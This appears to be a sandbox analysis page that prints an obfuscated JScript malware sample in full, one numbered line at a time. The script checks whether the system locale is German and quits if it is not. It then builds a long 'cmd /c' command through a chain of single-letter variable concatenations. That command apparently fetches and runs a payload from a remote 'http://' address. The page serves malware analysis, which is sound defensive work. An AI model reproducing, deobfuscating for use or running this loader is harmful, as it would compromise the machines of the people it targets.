Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function rclemu() { |
|
1 | woxnyen = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var tbusdhgc = this[hqzgcoi + vqahbckwh + ivjel + eymgcctcs + ararikr + wfsljpfpa + duweino + ibhirsrj] ( this[rifbngrp + nvnpu + eolwa + ivjel + klyjcsfo + hqzgcoi + ibhirsrj][ivrljt + ivjel + ararikr + vqahbckwh + ibhirsrj + ararikr + bqcpu + urofouk + kirricso + ararikr + eolwa + ibhirsrj] ( rifbngrp + nvnpu + eolwa + ivjel + klyjcsfo + hqzgcoi + ibhirsrj + okiezbbn + nvnpu + bzelj + ararikr + zkekfv + zkekfv ) [asvldxcqv + ararikr + bpastzejv + asvldxcqv + ararikr + vqahbckwh + sangwg] ( qyjirlizj + ibfyw + ivrutsosl + cuubnpag + ldqiw + ivrljt + ablmdinql + asvldxcqv + asvldxcqv + ivrutsosl + okuuepo + gmkaar + ldqiw + ablmdinql + nvnpu + ivrutsosl + asvldxcqv + hyzwsdyus + ivrljt + vfcoazaij + duweino + ibhirsrj + ivjel + vfcoazaij + zkekfv + ijbkjd + gtjigqc + vqahbckwh + duweino + ararikr + zkekfv + hyzwsdyus + wfsljpfpa + duweino + ibhirsrj + ararikr + ivjel + duweino + vqahbckwh + ibhirsrj + klyjcsfo + vfcoazaij + duweino + vqahbckwh + zkekfv + hyzwsdyus + tinqi + vfcoazaij + eolwa + vqahbckwh + zkekfv + ararikr ), 16 ); |
|
3 | for ( fbmtvc = 0 ; fbmtvc < woxnyen[zkekfv + ararikr + duweino + bpastzejv + ibhirsrj + bzelj] ; ++ fbmtvc ) | |
4 | { | |
5 | if ( tbusdhgc == woxnyen[fbmtvc] ) | |
6 | { | |
7 | tbusdhgc = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( tbusdhgc !== true ) | |
12 | this[rifbngrp + nvnpu + eolwa + ivjel + klyjcsfo + hqzgcoi + ibhirsrj][dupnlnej + gfqxtjtd + klyjcsfo + ibhirsrj] ( ); | |
13 | this[rifbngrp + nvnpu + eolwa + ivjel + klyjcsfo + hqzgcoi + ibhirsrj][ivrljt + ivjel + ararikr + vqahbckwh + ibhirsrj + ararikr + bqcpu + urofouk + kirricso + ararikr + eolwa + ibhirsrj] ( rifbngrp + nvnpu + eolwa + ivjel + klyjcsfo + hqzgcoi + ibhirsrj + okiezbbn + nvnpu + bzelj + ararikr + zkekfv + zkekfv ) [ivjel + gfqxtjtd + duweino] ( eolwa + izxeifub + sangwg + ijbkjd + ndjloba + eolwa + ijbkjd + hqzgcoi + vfcoazaij + zkmfpp + ararikr + ivjel + eymgcctcs + bzelj + ararikr + zkekfv + zkekfv + okiezbbn + ararikr + vzkimfm + ararikr + ijbkjd + yqljizt + ivrljt + vfcoazaij + izxeifub + izxeifub + vqahbckwh + duweino + sangwg + ijbkjd + sbmqaax + wfsljpfpa + duweino + cvqsk + vfcoazaij + ghgvdj + ararikr + yqljizt + rifbngrp + ararikr + urofouk + asvldxcqv + ararikr + kvgwuw + gfqxtjtd + ararikr + eymgcctcs + ibhirsrj + ijbkjd + yqljizt + bqcpu + gfqxtjtd + ibhirsrj + miwyrgz + klyjcsfo + zkekfv + ararikr + ijbkjd + ksubt + ibhirsrj + ararikr + izxeifub + hqzgcoi + ksubt + hyzwsdyus + klyjcsfo + duweino + cvqsk + vfcoazaij + klyjcsfo + eolwa + ararikr + okiezbbn + hqzgcoi + sangwg + pmvsy + ijbkjd + bzelj + ibhirsrj + ibhirsrj + hqzgcoi + krahh + ndjloba + ndjloba + rdjdngmdv + irqav + zlfctr + okiezbbn + rdjdngmdv + pppyfegc + zlfctr + okiezbbn + rdjdngmdv + okiezbbn + iomrbii + cddbj + ecfoyva + ndjloba + klyjcsfo + duweino + cvqsk + vfcoazaij + klyjcsfo + eolwa + ararikr + okiezbbn + hqzgcoi + bzelj + hqzgcoi + sbmqaax + ojxpd + ojxpd + eymgcctcs + ibhirsrj + vqahbckwh + ivjel + ibhirsrj + ijbkjd + ksubt + ibhirsrj + ararikr + izxeifub + hqzgcoi + ksubt + hyzwsdyus + klyjcsfo + duweino + cvqsk + vfcoazaij + klyjcsfo + eolwa + ararikr + okiezbbn + hqzgcoi + sangwg + pmvsy + ojxpd + ojxpd + eolwa + izxeifub + sangwg + ijbkjd + ndjloba + eolwa + ijbkjd + duweino + ararikr + ibhirsrj + ijbkjd + gfqxtjtd + eymgcctcs + ararikr + ijbkjd + hyzwsdyus + hyzwsdyus + rdjdngmdv + irqav + zlfctr + okiezbbn + rdjdngmdv + pppyfegc + zlfctr + okiezbbn + rdjdngmdv + okiezbbn + iomrbii + cddbj + ecfoyva + dusmnvpao + wjnqme + wjnqme + wjnqme + wjnqme + hyzwsdyus + sangwg + vqahbckwh + cvqsk + zkmfpp + zkmfpp + zkmfpp + ivjel + vfcoazaij + vfcoazaij + ibhirsrj + hyzwsdyus + ojxpd + ojxpd + eolwa + izxeifub + sangwg + ijbkjd + ndjloba + eolwa + ijbkjd + ivjel + ararikr + bpastzejv + eymgcctcs + cvqsk + ivjel + zlfctr + iomrbii + ijbkjd + ndjloba + eymgcctcs + ijbkjd + hyzwsdyus + hyzwsdyus + rdjdngmdv + irqav + zlfctr + okiezbbn + rdjdngmdv + pppyfegc + zlfctr + okiezbbn + rdjdngmdv + okiezbbn + iomrbii + cddbj + ecfoyva + dusmnvpao + wjnqme + wjnqme + wjnqme + wjnqme + hyzwsdyus + sangwg + vqahbckwh + cvqsk + zkmfpp + zkmfpp + zkmfpp + ivjel + vfcoazaij + vfcoazaij + ibhirsrj + hyzwsdyus + iomrbii + ooppg + iomrbii + ecfoyva + ecfoyva + rdjdngmdv + ecfoyva + ooppg + rdjdngmdv + ecfoyva + iomrbii + rdjdngmdv + iomrbii + cddbj + okiezbbn + sangwg + zkekfv + zkekfv, 0, false ); |
|
14 | } | |
15 | sangwg = "P"; | |
16 | sangwg = "n"; | |
17 | sangwg = "c"; | |
18 | sangwg = "h"; | |
19 | sangwg = "p"; | |
20 | sangwg = "J"; | |
21 | sangwg = "z"; | |
22 | sangwg = "E"; | |
23 | sangwg = "J"; | |
24 | sangwg = "p"; | |
25 | sangwg = "O"; | |
26 | sangwg = "J"; | |
27 | sangwg = "x"; | |
28 | sangwg = "J"; | |
29 | sangwg = "y"; | |
30 | sangwg = "Q"; | |
31 | sangwg = "f"; | |
32 | sangwg = "i"; | |
33 | sangwg = "n"; | |
34 | sangwg = "i"; | |
35 | sangwg = "W"; | |
36 | sangwg = "R"; | |
37 | sangwg = "b"; | |
38 | sangwg = "O"; | |
39 | sangwg = "O"; | |
40 | sangwg = "q"; | |
41 | sangwg = "y"; | |
42 | sangwg = "J"; | |
43 | sangwg = "X"; | |
44 | sangwg = "n"; | |
45 | sangwg = "i"; | |
46 | sangwg = "m"; | |
47 | sangwg = "z"; | |
48 | sangwg = "N"; | |
49 | sangwg = "R"; | |
50 | sangwg = "u"; | |
51 | sangwg = "j"; | |
52 | sangwg = "R"; | |
53 | sangwg = "B"; | |
54 | sangwg = "Q"; | |
55 | sangwg = "V"; | |
56 | sangwg = "M"; | |
57 | sangwg = "d"; | |
58 | nvnpu = "t"; | |
59 | nvnpu = "o"; | |
60 | nvnpu = "m"; | |
61 | nvnpu = "f"; | |
62 | nvnpu = "t"; | |
63 | nvnpu = "a"; | |
64 | nvnpu = "W"; | |
65 | nvnpu = "A"; | |
66 | nvnpu = "X"; | |
67 | nvnpu = "S"; | |
68 | pmvsy = "B"; | |
69 | pmvsy = "v"; | |
70 | pmvsy = "w"; | |
71 | pmvsy = "x"; | |
72 | pmvsy = "g"; | |
73 | pmvsy = "k"; | |
74 | pmvsy = "r"; | |
75 | pmvsy = "E"; | |
76 | pmvsy = "p"; | |
77 | pmvsy = "H"; | |
78 | pmvsy = "I"; | |
79 | pmvsy = "X"; | |
80 | pmvsy = "z"; | |
81 | pmvsy = "d"; | |
82 | pmvsy = "b"; | |
83 | pmvsy = "v"; | |
84 | pmvsy = "k"; | |
85 | pmvsy = "h"; | |
86 | pmvsy = "d"; | |
87 | pmvsy = "f"; | |
88 | pmvsy = "n"; | |
89 | pmvsy = "z"; | |
90 | pmvsy = "f"; | |
91 | pmvsy = "Z"; | |
92 | pmvsy = "D"; | |
93 | pmvsy = "f"; | |
94 | okiezbbn = "b"; | |
95 | okiezbbn = "K"; | |
96 | okiezbbn = "P"; | |
97 | okiezbbn = "U"; | |
98 | okiezbbn = "H"; | |
99 | okiezbbn = "Q"; | |
100 | okiezbbn = "C"; | |
101 | okiezbbn = "J"; | |
102 | okiezbbn = "g"; | |
103 | okiezbbn = "n"; | |
104 | okiezbbn = "r"; | |
105 | okiezbbn = "H"; | |
106 | okiezbbn = "."; | |
107 | cddbj = "L"; | |
108 | cddbj = "l"; | |
109 | cddbj = "X"; | |
110 | cddbj = "X"; | |
111 | cddbj = "W"; | |
112 | cddbj = "T"; | |
113 | cddbj = "u"; | |
114 | cddbj = "M"; | |
115 | cddbj = "i"; | |
116 | cddbj = "Z"; | |
117 | cddbj = "D"; | |
118 | cddbj = "V"; | |
119 | cddbj = "B"; | |
120 | cddbj = "E"; | |
121 | cddbj = "L"; | |
122 | cddbj = "N"; | |
123 | cddbj = "I"; | |
124 | cddbj = "d"; | |
125 | cddbj = "h"; | |
126 | cddbj = "n"; | |
127 | cddbj = "x"; | |
128 | cddbj = "Z"; | |
129 | cddbj = "T"; | |
130 | cddbj = "w"; | |
131 | cddbj = "J"; | |
132 | cddbj = "H"; | |
133 | cddbj = "J"; | |
134 | cddbj = "E"; | |
135 | cddbj = "W"; | |
136 | cddbj = "w"; | |
137 | cddbj = "u"; | |
138 | cddbj = "G"; | |
139 | cddbj = "C"; | |
140 | cddbj = "0"; | |
141 | gtjigqc = "z"; | |
142 | gtjigqc = "S"; | |
143 | gtjigqc = "t"; | |
144 | gtjigqc = "c"; | |
145 | gtjigqc = "Y"; | |
146 | gtjigqc = "P"; | |
147 | zlfctr = "C"; | |
148 | zlfctr = "B"; | |
149 | zlfctr = "S"; | |
150 | zlfctr = "e"; | |
151 | zlfctr = "I"; | |
152 | zlfctr = "k"; | |
153 | zlfctr = "p"; | |
154 | zlfctr = "h"; | |
155 | zlfctr = "n"; | |
156 | zlfctr = "P"; | |
157 | zlfctr = "t"; | |
158 | zlfctr = "s"; | |
159 | zlfctr = "x"; | |
160 | zlfctr = "q"; | |
161 | zlfctr = "g"; | |
162 | zlfctr = "D"; | |
163 | zlfctr = "3"; | |
164 | asvldxcqv = "P"; | |
165 | asvldxcqv = "P"; | |
166 | asvldxcqv = "L"; | |
167 | asvldxcqv = "T"; | |
168 | asvldxcqv = "p"; | |
169 | asvldxcqv = "H"; | |
170 | asvldxcqv = "m"; | |
171 | asvldxcqv = "V"; | |
172 | asvldxcqv = "y"; | |
173 | asvldxcqv = "N"; | |
174 | asvldxcqv = "G"; | |
175 | asvldxcqv = "n"; | |
176 | asvldxcqv = "o"; | |
177 | asvldxcqv = "X"; | |
178 | asvldxcqv = "r"; | |
179 | asvldxcqv = "c"; | |
180 | asvldxcqv = "L"; | |
181 | asvldxcqv = "q"; | |
182 | asvldxcqv = "M"; | |
183 | asvldxcqv = "R"; | |
184 | izxeifub = "m"; | |
185 | krahh = "S"; | |
186 | krahh = "d"; | |
187 | krahh = "m"; | |
188 | krahh = "r"; | |
189 | krahh = "r"; | |
190 | krahh = "G"; | |
191 | krahh = "X"; | |
192 | krahh = "i"; | |
193 | krahh = "D"; | |
194 | krahh = "K"; | |
195 | krahh = "L"; | |
196 | krahh = "T"; | |
197 | krahh = "d"; | |
198 | krahh = "N"; | |
199 | krahh = "A"; | |
200 | krahh = "F"; | |
201 | krahh = "E"; | |
202 | krahh = "s"; | |
203 | krahh = "G"; | |
204 | krahh = "N"; | |
205 | krahh = "k"; | |
206 | krahh = ":"; | |
207 | zkekfv = "T"; | |
208 | zkekfv = "Q"; | |
209 | zkekfv = "p"; | |
210 | zkekfv = "J"; | |
211 | zkekfv = "W"; | |
212 | zkekfv = "y"; | |
213 | zkekfv = "m"; | |
214 | zkekfv = "R"; | |
215 | zkekfv = "T"; | |
216 | zkekfv = "O"; | |
217 | zkekfv = "K"; | |
218 | zkekfv = "t"; | |
219 | zkekfv = "m"; | |
220 | zkekfv = "T"; | |
221 | zkekfv = "t"; | |
222 | zkekfv = "a"; | |
223 | zkekfv = "a"; | |
224 | zkekfv = "p"; | |
225 | zkekfv = "u"; | |
226 | zkekfv = "k"; | |
227 | zkekfv = "z"; | |
228 | zkekfv = "P"; | |
229 | zkekfv = "v"; | |
230 | zkekfv = "h"; | |
231 | zkekfv = "I"; | |
232 | zkekfv = "q"; | |
233 | zkekfv = "h"; | |
234 | zkekfv = "L"; | |
235 | zkekfv = "k"; | |
236 | zkekfv = "l"; | |
237 | klyjcsfo = "z"; | |
238 | klyjcsfo = "T"; | |
239 | klyjcsfo = "h"; | |
240 | klyjcsfo = "e"; | |
241 | klyjcsfo = "k"; | |
242 | klyjcsfo = "X"; | |
243 | klyjcsfo = "U"; | |
244 | klyjcsfo = "V"; | |
245 | klyjcsfo = "i"; | |
246 | klyjcsfo = "n"; | |
247 | klyjcsfo = "N"; | |
248 | klyjcsfo = "P"; | |
249 | klyjcsfo = "C"; | |
250 | klyjcsfo = "s"; | |
251 | klyjcsfo = "P"; | |
252 | klyjcsfo = "Q"; | |
253 | klyjcsfo = "y"; | |
254 | klyjcsfo = "m"; | |
255 | klyjcsfo = "B"; | |
256 | klyjcsfo = "g"; | |
257 | klyjcsfo = "r"; | |
258 | klyjcsfo = "T"; | |
259 | klyjcsfo = "P"; | |
260 | klyjcsfo = "h"; | |
261 | klyjcsfo = "e"; | |
262 | klyjcsfo = "U"; | |
263 | klyjcsfo = "b"; | |
264 | klyjcsfo = "t"; | |
265 | klyjcsfo = "i"; | |
266 | ndjloba = "i"; | |
267 | ndjloba = "R"; | |
268 | ndjloba = "z"; | |
269 | ndjloba = "m"; | |
270 | ndjloba = "D"; | |
271 | ndjloba = "J"; | |
272 | ndjloba = "U"; | |
273 | ndjloba = "f"; | |
274 | ndjloba = "Z"; | |
275 | ndjloba = "J"; | |
276 | ndjloba = "T"; | |
277 | ndjloba = "G"; | |
278 | ndjloba = "W"; | |
279 | ndjloba = "z"; | |
280 | ndjloba = "/"; | |
281 | dusmnvpao = "c"; | |
282 | dusmnvpao = "m"; | |
283 | dusmnvpao = "w"; | |
284 | dusmnvpao = "S"; | |
285 | dusmnvpao = "D"; | |
286 | dusmnvpao = "m"; | |
287 | dusmnvpao = "v"; | |
288 | dusmnvpao = "V"; | |
289 | dusmnvpao = "w"; | |
290 | dusmnvpao = "@"; | |
291 | eolwa = "Z"; | |
292 | eolwa = "F"; | |
293 | eolwa = "l"; | |
294 | eolwa = "J"; | |
295 | eolwa = "g"; | |
296 | eolwa = "g"; | |
297 | eolwa = "F"; | |
298 | eolwa = "a"; | |
299 | eolwa = "C"; | |
300 | eolwa = "k"; | |
301 | eolwa = "G"; | |
302 | eolwa = "R"; | |
303 | eolwa = "x"; | |
304 | eolwa = "Y"; | |
305 | eolwa = "K"; | |
306 | eolwa = "A"; | |
307 | eolwa = "R"; | |
308 | eolwa = "J"; | |
309 | eolwa = "s"; | |
310 | eolwa = "q"; | |
311 | eolwa = "c"; | |
312 | ldqiw = "h"; | |
313 | ldqiw = "W"; | |
314 | ldqiw = "n"; | |
315 | ldqiw = "y"; | |
316 | ldqiw = "A"; | |
317 | ldqiw = "q"; | |
318 | ldqiw = "I"; | |
319 | ldqiw = "z"; | |
320 | ldqiw = "x"; | |
321 | ldqiw = "q"; | |
322 | ldqiw = "h"; | |
323 | ldqiw = "b"; | |
324 | ldqiw = "j"; | |
325 | ldqiw = "Y"; | |
326 | ldqiw = "c"; | |
327 | ldqiw = "H"; | |
328 | ldqiw = "x"; | |
329 | ldqiw = "S"; | |
330 | ldqiw = "Z"; | |
331 | ldqiw = "Q"; | |
332 | ldqiw = "k"; | |
333 | ldqiw = "e"; | |
334 | ldqiw = "k"; | |
335 | ldqiw = "j"; | |
336 | ldqiw = "g"; | |
337 | ldqiw = "k"; | |
338 | ldqiw = "J"; | |
339 | ldqiw = "K"; | |
340 | ldqiw = "P"; | |
341 | ldqiw = "E"; | |
342 | ldqiw = "J"; | |
343 | ldqiw = "T"; | |
344 | ldqiw = "_"; | |
345 | eymgcctcs = "R"; | |
346 | eymgcctcs = "c"; | |
347 | eymgcctcs = "d"; | |
348 | eymgcctcs = "c"; | |
349 | eymgcctcs = "c"; | |
350 | eymgcctcs = "a"; | |
351 | eymgcctcs = "M"; | |
352 | eymgcctcs = "E"; | |
353 | eymgcctcs = "M"; | |
354 | eymgcctcs = "a"; | |
355 | eymgcctcs = "B"; | |
356 | eymgcctcs = "y"; | |
357 | eymgcctcs = "u"; | |
358 | eymgcctcs = "y"; | |
359 | eymgcctcs = "g"; | |
360 | eymgcctcs = "x"; | |
361 | eymgcctcs = "K"; | |
362 | eymgcctcs = "p"; | |
363 | eymgcctcs = "V"; | |
364 | eymgcctcs = "U"; | |
365 | eymgcctcs = "M"; | |
366 | eymgcctcs = "f"; | |
367 | eymgcctcs = "B"; | |
368 | eymgcctcs = "B"; | |
369 | eymgcctcs = "b"; | |
370 | eymgcctcs = "Y"; | |
371 | eymgcctcs = "d"; | |
372 | eymgcctcs = "h"; | |
373 | eymgcctcs = "P"; | |
374 | eymgcctcs = "s"; | |
375 | ibfyw = "L"; | |
376 | ibfyw = "v"; | |
377 | ibfyw = "E"; | |
378 | ibfyw = "t"; | |
379 | ibfyw = "R"; | |
380 | ibfyw = "q"; | |
381 | ibfyw = "i"; | |
382 | ibfyw = "j"; | |
383 | ibfyw = "M"; | |
384 | ibfyw = "Q"; | |
385 | ibfyw = "M"; | |
386 | ibfyw = "B"; | |
387 | ibfyw = "i"; | |
388 | ibfyw = "w"; | |
389 | ibfyw = "I"; | |
390 | ibfyw = "h"; | |
391 | ibfyw = "x"; | |
392 | ibfyw = "l"; | |
393 | ibfyw = "W"; | |
394 | ibfyw = "w"; | |
395 | ibfyw = "N"; | |
396 | ibfyw = "G"; | |
397 | ibfyw = "e"; | |
398 | ibfyw = "H"; | |
399 | ibfyw = "g"; | |
400 | ibfyw = "t"; | |
401 | ibfyw = "R"; | |
402 | ibfyw = "Q"; | |
403 | ibfyw = "G"; | |
404 | ibfyw = "R"; | |
405 | ibfyw = "q"; | |
406 | ibfyw = "L"; | |
407 | ibfyw = "U"; | |
408 | ibfyw = "s"; | |
409 | ibfyw = "P"; | |
410 | ibfyw = "z"; | |
411 | ibfyw = "Q"; | |
412 | ibfyw = "F"; | |
413 | ibfyw = "R"; | |
414 | ibfyw = "K"; | |
415 | sbmqaax = "u"; | |
416 | sbmqaax = "k"; | |
417 | sbmqaax = "A"; | |
418 | sbmqaax = "o"; | |
419 | sbmqaax = "o"; | |
420 | sbmqaax = "n"; | |
421 | sbmqaax = "t"; | |
422 | sbmqaax = "R"; | |
423 | sbmqaax = "e"; | |
424 | sbmqaax = "S"; | |
425 | sbmqaax = "y"; | |
426 | sbmqaax = "c"; | |
427 | sbmqaax = "j"; | |
428 | sbmqaax = "j"; | |
429 | sbmqaax = "y"; | |
430 | sbmqaax = "O"; | |
431 | sbmqaax = "H"; | |
432 | sbmqaax = "X"; | |
433 | sbmqaax = "T"; | |
434 | sbmqaax = "N"; | |
435 | sbmqaax = "v"; | |
436 | sbmqaax = "x"; | |
437 | sbmqaax = "E"; | |
438 | sbmqaax = "O"; | |
439 | sbmqaax = "I"; | |
440 | sbmqaax = "q"; | |
441 | sbmqaax = "N"; | |
442 | sbmqaax = "N"; | |
443 | sbmqaax = "V"; | |
444 | sbmqaax = "J"; | |
445 | sbmqaax = "A"; | |
446 | sbmqaax = "\""; | |
447 | vqahbckwh = "M"; | |
448 | vqahbckwh = "T"; | |
449 | vqahbckwh = "C"; | |
450 | vqahbckwh = "D"; | |
451 | vqahbckwh = "D"; | |
452 | vqahbckwh = "F"; | |
453 | vqahbckwh = "L"; | |
454 | vqahbckwh = "v"; | |
455 | vqahbckwh = "X"; | |
456 | vqahbckwh = "u"; | |
457 | vqahbckwh = "B"; | |
458 | vqahbckwh = "W"; | |
459 | vqahbckwh = "U"; | |
460 | vqahbckwh = "M"; | |
461 | vqahbckwh = "B"; | |
462 | vqahbckwh = "M"; | |
463 | vqahbckwh = "p"; | |
464 | vqahbckwh = "p"; | |
465 | vqahbckwh = "a"; | |
466 | zkmfpp = "Q"; | |
467 | zkmfpp = "T"; | |
468 | zkmfpp = "s"; | |
469 | zkmfpp = "L"; | |
470 | zkmfpp = "A"; | |
471 | zkmfpp = "k"; | |
472 | zkmfpp = "j"; | |
473 | zkmfpp = "w"; | |
474 | zkmfpp = "A"; | |
475 | zkmfpp = "P"; | |
476 | zkmfpp = "q"; | |
477 | zkmfpp = "W"; | |
478 | zkmfpp = "D"; | |
479 | zkmfpp = "L"; | |
480 | zkmfpp = "x"; | |
481 | zkmfpp = "w"; | |
482 | zkmfpp = "r"; | |
483 | zkmfpp = "Y"; | |
484 | zkmfpp = "C"; | |
485 | zkmfpp = "k"; | |
486 | zkmfpp = "u"; | |
487 | zkmfpp = "A"; | |
488 | zkmfpp = "N"; | |
489 | zkmfpp = "M"; | |
490 | zkmfpp = "C"; | |
491 | zkmfpp = "w"; | |
492 | zkmfpp = "N"; | |
493 | zkmfpp = "I"; | |
494 | zkmfpp = "y"; | |
495 | zkmfpp = "W"; | |
496 | zkmfpp = "Y"; | |
497 | zkmfpp = "s"; | |
498 | zkmfpp = "w"; | |
499 | ivrutsosl = "Y"; | |
500 | ivrutsosl = "E"; | |
501 | ivrutsosl = "a"; | |
502 | ivrutsosl = "T"; | |
503 | ivrutsosl = "r"; | |
504 | ivrutsosl = "r"; | |
505 | ivrutsosl = "J"; | |
506 | ivrutsosl = "V"; | |
507 | ivrutsosl = "d"; | |
508 | ivrutsosl = "O"; | |
509 | ivrutsosl = "L"; | |
510 | ivrutsosl = "V"; | |
511 | ivrutsosl = "u"; | |
512 | ivrutsosl = "b"; | |
513 | ivrutsosl = "P"; | |
514 | ivrutsosl = "q"; | |
515 | ivrutsosl = "H"; | |
516 | ivrutsosl = "E"; | |
517 | ivrutsosl = "E"; | |
518 | ivrutsosl = "D"; | |
519 | ivrutsosl = "x"; | |
520 | ivrutsosl = "P"; | |
521 | ivrutsosl = "r"; | |
522 | ivrutsosl = "V"; | |
523 | ivrutsosl = "e"; | |
524 | ivrutsosl = "T"; | |
525 | ivrutsosl = "Q"; | |
526 | ivrutsosl = "E"; | |
527 | bzelj = "e"; | |
528 | bzelj = "q"; | |
529 | bzelj = "y"; | |
530 | bzelj = "q"; | |
531 | bzelj = "A"; | |
532 | bzelj = "l"; | |
533 | bzelj = "J"; | |
534 | bzelj = "s"; | |
535 | bzelj = "k"; | |
536 | bzelj = "H"; | |
537 | bzelj = "w"; | |
538 | bzelj = "l"; | |
539 | bzelj = "e"; | |
540 | bzelj = "G"; | |
541 | bzelj = "g"; | |
542 | bzelj = "A"; | |
543 | bzelj = "X"; | |
544 | bzelj = "W"; | |
545 | bzelj = "i"; | |
546 | bzelj = "Y"; | |
547 | bzelj = "l"; | |
548 | bzelj = "U"; | |
549 | bzelj = "l"; | |
550 | bzelj = "x"; | |
551 | bzelj = "Q"; | |
552 | bzelj = "y"; | |
553 | bzelj = "D"; | |
554 | bzelj = "e"; | |
555 | bzelj = "j"; | |
556 | bzelj = "G"; | |
557 | bzelj = "W"; | |
558 | bzelj = "V"; | |
559 | bzelj = "q"; | |
560 | bzelj = "g"; | |
561 | bzelj = "f"; | |
562 | bzelj = "M"; | |
563 | bzelj = "g"; | |
564 | bzelj = "b"; | |
565 | bzelj = "x"; | |
566 | bzelj = "J"; | |
567 | bzelj = "h"; | |
568 | ivjel = "r"; | |
569 | miwyrgz = "Q"; | |
570 | miwyrgz = "S"; | |
571 | miwyrgz = "s"; | |
572 | miwyrgz = "T"; | |
573 | miwyrgz = "O"; | |
574 | miwyrgz = "K"; | |
575 | miwyrgz = "M"; | |
576 | miwyrgz = "x"; | |
577 | miwyrgz = "N"; | |
578 | miwyrgz = "t"; | |
579 | miwyrgz = "d"; | |
580 | miwyrgz = "m"; | |
581 | miwyrgz = "j"; | |
582 | miwyrgz = "X"; | |
583 | miwyrgz = "V"; | |
584 | miwyrgz = "d"; | |
585 | miwyrgz = "C"; | |
586 | miwyrgz = "k"; | |
587 | miwyrgz = "c"; | |
588 | miwyrgz = "e"; | |
589 | miwyrgz = "C"; | |
590 | miwyrgz = "S"; | |
591 | miwyrgz = "v"; | |
592 | miwyrgz = "O"; | |
593 | miwyrgz = "j"; | |
594 | miwyrgz = "W"; | |
595 | miwyrgz = "R"; | |
596 | miwyrgz = "m"; | |
597 | miwyrgz = "e"; | |
598 | miwyrgz = "F"; | |
599 | bpastzejv = "L"; | |
600 | bpastzejv = "C"; | |
601 | bpastzejv = "a"; | |
602 | bpastzejv = "I"; | |
603 | bpastzejv = "t"; | |
604 | bpastzejv = "F"; | |
605 | bpastzejv = "l"; | |
606 | bpastzejv = "i"; | |
607 | bpastzejv = "q"; | |
608 | bpastzejv = "k"; | |
609 | bpastzejv = "T"; | |
610 | bpastzejv = "H"; | |
611 | bpastzejv = "S"; | |
612 | bpastzejv = "D"; | |
613 | bpastzejv = "v"; | |
614 | bpastzejv = "a"; | |
615 | bpastzejv = "g"; | |
616 | cvqsk = "m"; | |
617 | cvqsk = "W"; | |
618 | cvqsk = "z"; | |
619 | cvqsk = "p"; | |
620 | cvqsk = "D"; | |
621 | cvqsk = "u"; | |
622 | cvqsk = "Y"; | |
623 | cvqsk = "E"; | |
624 | cvqsk = "o"; | |
625 | cvqsk = "C"; | |
626 | cvqsk = "d"; | |
627 | cvqsk = "e"; | |
628 | cvqsk = "z"; | |
629 | cvqsk = "S"; | |
630 | cvqsk = "a"; | |
631 | cvqsk = "t"; | |
632 | cvqsk = "w"; | |
633 | cvqsk = "L"; | |
634 | cvqsk = "s"; | |
635 | cvqsk = "p"; | |
636 | cvqsk = "h"; | |
637 | cvqsk = "Y"; | |
638 | cvqsk = "Y"; | |
639 | cvqsk = "H"; | |
640 | cvqsk = "h"; | |
641 | cvqsk = "T"; | |
642 | cvqsk = "N"; | |
643 | cvqsk = "G"; | |
644 | cvqsk = "B"; | |
645 | cvqsk = "f"; | |
646 | cvqsk = "T"; | |
647 | cvqsk = "L"; | |
648 | cvqsk = "g"; | |
649 | cvqsk = "o"; | |
650 | cvqsk = "I"; | |
651 | cvqsk = "v"; | |
652 | gmkaar = "o"; | |
653 | gmkaar = "X"; | |
654 | gmkaar = "u"; | |
655 | gmkaar = "m"; | |
656 | gmkaar = "N"; | |
657 | gmkaar = "B"; | |
658 | gmkaar = "v"; | |
659 | gmkaar = "j"; | |
660 | gmkaar = "G"; | |
661 | gmkaar = "l"; | |
662 | gmkaar = "c"; | |
663 | gmkaar = "d"; | |
664 | gmkaar = "O"; | |
665 | gmkaar = "i"; | |
666 | gmkaar = "p"; | |
667 | gmkaar = "b"; | |
668 | gmkaar = "q"; | |
669 | gmkaar = "Q"; | |
670 | gmkaar = "l"; | |
671 | gmkaar = "x"; | |
672 | gmkaar = "c"; | |
673 | gmkaar = "Z"; | |
674 | gmkaar = "B"; | |
675 | gmkaar = "z"; | |
676 | gmkaar = "k"; | |
677 | gmkaar = "G"; | |
678 | gmkaar = "D"; | |
679 | gmkaar = "h"; | |
680 | gmkaar = "T"; | |
681 | gmkaar = "X"; | |
682 | gmkaar = "V"; | |
683 | gmkaar = "F"; | |
684 | gmkaar = "b"; | |
685 | gmkaar = "d"; | |
686 | gmkaar = "q"; | |
687 | gmkaar = "S"; | |
688 | gmkaar = "S"; | |
689 | gmkaar = "z"; | |
690 | gmkaar = "T"; | |
691 | gmkaar = "l"; | |
692 | gmkaar = "V"; | |
693 | gmkaar = "q"; | |
694 | gmkaar = "X"; | |
695 | gmkaar = "T"; | |
696 | bqcpu = "N"; | |
697 | bqcpu = "W"; | |
698 | bqcpu = "y"; | |
699 | bqcpu = "w"; | |
700 | bqcpu = "x"; | |
701 | bqcpu = "V"; | |
702 | bqcpu = "x"; | |
703 | bqcpu = "v"; | |
704 | bqcpu = "t"; | |
705 | bqcpu = "H"; | |
706 | bqcpu = "N"; | |
707 | bqcpu = "F"; | |
708 | bqcpu = "d"; | |
709 | bqcpu = "n"; | |
710 | bqcpu = "r"; | |
711 | bqcpu = "y"; | |
712 | bqcpu = "Z"; | |
713 | bqcpu = "Z"; | |
714 | bqcpu = "O"; | |
715 | bqcpu = "L"; | |
716 | bqcpu = "O"; | |
717 | hyzwsdyus = "r"; | |
718 | hyzwsdyus = "I"; | |
719 | hyzwsdyus = "D"; | |
720 | hyzwsdyus = "b"; | |
721 | hyzwsdyus = "u"; | |
722 | hyzwsdyus = "\\"; | |
723 | duweino = "i"; | |
724 | duweino = "Y"; | |
725 | duweino = "D"; | |
726 | duweino = "C"; | |
727 | duweino = "Q"; | |
728 | duweino = "Q"; | |
729 | duweino = "o"; | |
730 | duweino = "Q"; | |
731 | duweino = "x"; | |
732 | duweino = "W"; | |
733 | duweino = "E"; | |
734 | duweino = "D"; | |
735 | duweino = "s"; | |
736 | duweino = "t"; | |
737 | duweino = "q"; | |
738 | duweino = "v"; | |
739 | duweino = "j"; | |
740 | duweino = "W"; | |
741 | duweino = "h"; | |
742 | duweino = "i"; | |
743 | duweino = "l"; | |
744 | duweino = "a"; | |
745 | duweino = "k"; | |
746 | duweino = "n"; | |
747 | iomrbii = "W"; | |
748 | iomrbii = "d"; | |
